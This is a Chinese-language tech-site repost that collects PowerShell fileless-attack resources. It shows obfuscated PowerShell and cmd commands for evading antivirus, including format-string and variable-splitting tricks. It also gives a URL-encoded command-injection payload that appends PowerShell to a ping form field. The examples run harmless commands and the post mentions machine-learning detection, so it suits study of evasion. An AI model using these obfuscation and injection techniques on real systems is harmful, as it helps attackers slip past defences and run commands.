1. <dd id="erndk"></dd>
                1. powershell無文件攻擊場景匯總

                  互聯網 2022/6/22 7:22:49

                  一些重要的鏈接: powershell無文件挖礦 https://bbs.pediy.com/thread-253375.htm 無文件勒索 https://www.cnblogs.com/bonelee/p/15910502.html powershell AMSI https://www.cnblogs.com/bonelee/p/16221887.html 各種繞過AMSI,分割,編碼、xor、hex編碼等 https:/…

                  一些重要的鏈接:

                  powershell無文件挖礦  https://bbs.pediy.com/thread-253375.htm 

                  無文件勒索 https://www.cnblogs.com/bonelee/p/15910502.html

                  powershell AMSI https://www.cnblogs.com/bonelee/p/16221887.html

                  各種繞過AMSI,分割,編碼、xor、hex編碼等 https://www.cnblogs.com/bonelee/p/16221958.html ==》另外,還提到了powershell數據采集

                  AMSI底層機制的探討,如何繞過 https://www.cnblogs.com/bonelee/p/16220508.html

                  AMSI的介紹,有點老,可能不那么客觀 https://www.cnblogs.com/bonelee/p/15924898.html

                  powershell 通過base64、utf8和分割繞過殺軟 https://www.cnblogs.com/bonelee/p/15947640.html

                  無文件勒索 base64、xor編碼繞過 https://www.cnblogs.com/bonelee/p/15910558.html

                  下面這些繞過場景,可以使用ML檢測 https://www.cnblogs.com/bonelee/p/13768475.html

                   

                  具體的示例(不全,要結合上面文章綜合看):

                  將執行命令的字符串進行編碼來繞過檢測

                  (("{7}{4}{0}{13}{1}{10}{12}{3}{2}{6}{5}{11}{8}{9}"-f 'V','C',' 6yB','    (','VCFipVCF+VCFconf','eC[4,26','ENv:comsP',' (','InVCF','VCF)','F)',',25]-    jo',' hDY&','CF+VCFigV')).replAce(([ChAR]54+[ChAR]121+[ChAR]66),[StRing]    [ChAR]36).replAce('VCF',[StRing][ChAR]39).replAce('hDY','|') |.(    $verBOSEpREFEREnCE.tOSTRiNg()[1,3]+'x'-jOin'')
                  

                    

                   

                  將命令拆分和字符替換達到混淆效果:

                  C:\Users>set lkf3=e&&set z6km=se&&set 0d=r&&set tXvd=n&&set 7B=t u&&call set    AF=%tXvd%%lkf3%%7B%%z6km%%0d%&&call %AF%
                  
                  \\DESKTOP-NFBQJAR 的用戶帳戶
                  
                  -------------------------------------------------------------------------------
                  Administrator            DefaultAccount           Guest
                  WDAGUtilityAccount
                  命令成功完成。
                  
                  
                  C:\Users>echo %AF%
                  net user
                  

                    

                  BAT語法、Powershell 與certutil結合、PowerShell混淆以及Cmd混淆等命令執行

                  ipaddress=127.0.0.1+%26+powershell+%22%28%27ip%27%2B%27conf%27%2B%27ig%27%29+%7C%26+%28%24ENv%3AcomsPeC%5B4%2C26%2C25%5D-joIn%27%27%29%22&submit=ping
                  還原后:
                  ipaddress=127.0.0.1+&+@^p^o^w^e^r^shell+C:\W*?w?\S*?32\?a?c.e?e&submit=ping
                  

                   

                  @^p^o^w^e^r^shell C:\W*?w?\S*?32\?a?c.e?e
                  

                    

                  利用powershell$Env進行命令注入利用

                  powershell混淆:

                  執行ipconfig

                  powershell "('ip'+'conf'+'ig') |& ($ENv:comsPeC[4,26,25]-joIn'')"
                  

                   

                   

                  隨時隨地學軟件編程-關注百度小程序和微信小程序
                  關于找一找教程網

                  本站文章僅代表作者觀點,不代表本站立場,所有文章非營利性免費分享。
                  本站提供了軟件編程、網站開發技術、服務器運維、人工智能等等IT技術文章,希望廣大程序員努力學習,讓我們用科技改變世界。
                  [powershell無文件攻擊場景匯總]http://www.yachtsalesaustralia.com/tech/detail-330205.html

                  贊(0)
                  關注微信小程序
                  程序員編程王-隨時隨地學編程

                  掃描二維碼或查找【程序員編程王】

                  可以隨時隨地學編程啦!

                  技術文章導航 更多>
                  国产在线拍揄自揄视频菠萝

                        1. <dd id="erndk"></dd>